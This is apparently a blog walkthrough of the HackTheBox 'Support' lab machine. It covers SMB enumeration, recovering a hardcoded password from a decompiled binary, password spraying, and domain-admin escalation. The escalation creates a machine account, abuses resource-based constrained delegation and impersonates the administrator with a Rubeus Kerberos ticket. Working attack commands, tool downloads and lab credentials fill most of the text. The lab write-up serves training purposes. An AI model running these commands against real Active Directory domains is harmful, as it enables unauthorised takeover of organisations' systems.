Hello guys, today i would like to share with you the walkthrough to Support machine on HackTheBox.
Notice:
The target ip changed because i had to respawn my machine due to lack of connectivity
Let’s start with an Nmap scan.
I used the following command :
nmap -sC -sV -A -O -Pn 10.129.37.214
this the output i got:
Ok after i found there is an smb port open, i tried to enumerate the users with the smb lookupsid exploit on msfconsole.
This is the output i got:
Nothing speical, saved the output on a text file to use it later.
Let’s try enumerate with enum4linux, With the following command:
enum4linux -U 10.129.37.214
Ok nothing special, lets try enumerate the SMB Shares and see if we can access one of the shares.
Write the following command :
smbclient -L 10.129.37.214 -N
- -L for list the shares
- -N for ‘no password’ login
‘support-tools’ really caught my eye, i tried to connect to the share point without any creds with the following command:
smbclient \\\\10.129.37.214\\support-tools -N
ok so going through the file names i right away saw the UserInfo.exe.zip — very intresting.
i used the ‘get’ command to download it into my machine. Notice you are in super user session in your terminal otherwise download files to the machine can be failed.
I send the zip into my email to try to decompile them with dnSpy.
While navigating through sourcecode of UserInfo.exe i found this:
Looks like a base64 encoded string with the key — ‘’armando’’
I built a little script in python to try to decrypt it :
The output i got was:
nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
That was one of the times i really didn’t know what to do with this output.
After couple of searches in google and scrolling into my old HTB Machine reports. i remembered i once got a something familiar to this and i used ldapsearch!
After couple of tries i actually managed to crack the password with ldapsearch.
with the following command:
ldapsearch -D support\\ldap -H ldap://10.129.37.214 -w ‘nvEfEK16¹aM4$e7AclUf8x$tRWxPWO1%lmz’ -b ‘CN=Users,DC=support,DC=htb’ | grep info:
So after i found the password, i tried Password Spraying attack with a custom made user list.
1 — support
2 — admin
3 — administrator
4 — Guest
5 — agent
i tried the password spraying attack with crackmapexec with the following command:
crackmapexec winrm 10.129.37.214 -u ‘home/htb-kimd15/Desktop/users.txt -p Ironside47pleasure40Watchful
Connecting through evil-winrm with the creds i found:
Navigating through the folders and found the user flag!
So halfway done :), We now need Privilege Escalation.
Follow this steps carefully don’t skip anything, otherwise it wont work.
so in order to elevate our privileges we first need to download to scripts to our attacking machine.
The two scripts called : PowerView and Powermad. this will allow us to create a new user into the domain and impersonate as admin finally to elevate our privileges.
Type in your terminal:
wget https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/Recon/PowerView.ps1
— — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — — —
wget https://raw.githubusercontent.com/Kevin-Robertson/Powermad/master/Powermad.ps1
After we download the scripts, we can upload them with evil-winrm to the victim machine. once we upload them we need to import them as a module to the powershell environment
upload PowerView.ps1
Import-Module .\PowerView.ps1
upload Powermad.ps1
Import-Module .\Powermad.ps1
After we import the modules we need to check if we allowed to create users.
Get-DomainObject -Identity “dc=support,dc=htb”
Now let’s check the target machine is at least windows server 2012 so our exploit will work
Get-DomainController “htb” -Domain support.htb
Finally, we have to check if the target machine does not have the attribute msds-allowedtoactonbehalfofotheridentity set.
Get-NetComputer dc | Select-Object -Property name, msds-allowedtoactonbehalfofotheridentityname msds-allowedtoactonbehalfofotheridentity
After we checked all the necessary parameters for the exploit to work lets create a new User!
New-MachineAccount -MachineAccount kim -Password $(ConvertTo-SecureString ‘123456’ -AsPlainText -Force) -Verbose
Get-DomainComputer
Now we should create a raw security descriptor for the ‘’kim’’ user we just created. remember to change the SID to the one we found at the start of the walkthrough.
$SD = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList “O:BAD:(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1–5–21–1677581083–3380853377–188903654–5101)”
— —
$SDBytes = New-Object byte[] ($SD.BinaryLength)— —
$SD.GetBinaryForm($SDBytes, 0)
Get-DomainComputer dc | Set-DomainObject -Set @{‘msds-allowedtoactonbehalfofotheridentity’=$SDBytes} -Verbose
Now! the juicy part, lets try to impersonate admin!
First, download rubues.exe into your attacking machine and upload it to the victim, we need it to generate RC4 Hash.
wget https://github.com/r3motecontrol/Ghostpack-CompiledBinaries/raw/master/Rubeus.exe — from your attacker machine
Navigate back to evil-winrm and type this:
upload Rubeus.exe
.\Rubeus.exe hash /password:123456 /user:kim /domain:support.htb
After we generated the rc4, we can request a Kerberos ticket for ‘kim’ while impersonating admin. remember to change your RC4 Hash & username.
.\Rubeus.exe s4u /user:kim$ /rc4:32ED87BDB5FDC5E9CBA88547376818D4 /impersonateuser:administrator /msdsspn:cifs/dc.support.htb /ptt
Let’s generate a ticket in the victim’s machine and download it
[IO.File]::WriteAllBytes(“C:\Users\support\Documents\ticket.kirbi”, [Convert]::FromBase64String(“doIGYDCCBlygAwIBBaEDAgEWooIFcjCCBW5hggVqMIIFZqADAgEFoQ0bC1NVUFBPUlQuSFRCoiEwH6ADAgECoRgwFhsEY2lmcxsOZ
Now download it
download ticket.kirbi
Now lets make the ticket useable
Requirements:
— impacket
— pyasn1
— ticker_converter.py
— krb5-user
sudo apt update
pip3 install impacket
pip3 install pyasn1
wget https://raw.githubusercontent.com/zer1t0/ticket_converter/master/ticket_converter.py
sudo apt install krb5-user
Very Important! delete our existing tickets in our attacking machine with the following command
kdestroy
now lets make our ticket useful
python3 ticket_converter.py ticket.kirbi ticket.ccache
export KRB5CCNAME=ticket.ccache
now we must set the support.htb domain in our hosts file
type
vim /etc/hosts
after we added our ip and domain press ‘esc’ and then write ‘:wq’
this will save and exit.
Finally we can use the ticket to connect the machine as admin
impacket-wmiexec support.htb/administrator@dc.support.htb -no-pass -k
- -k for use the ticket we imported.
Now just navigate to the desktop folder and
type root.txt
to read the flag!
Thank your for reading,
Kim.
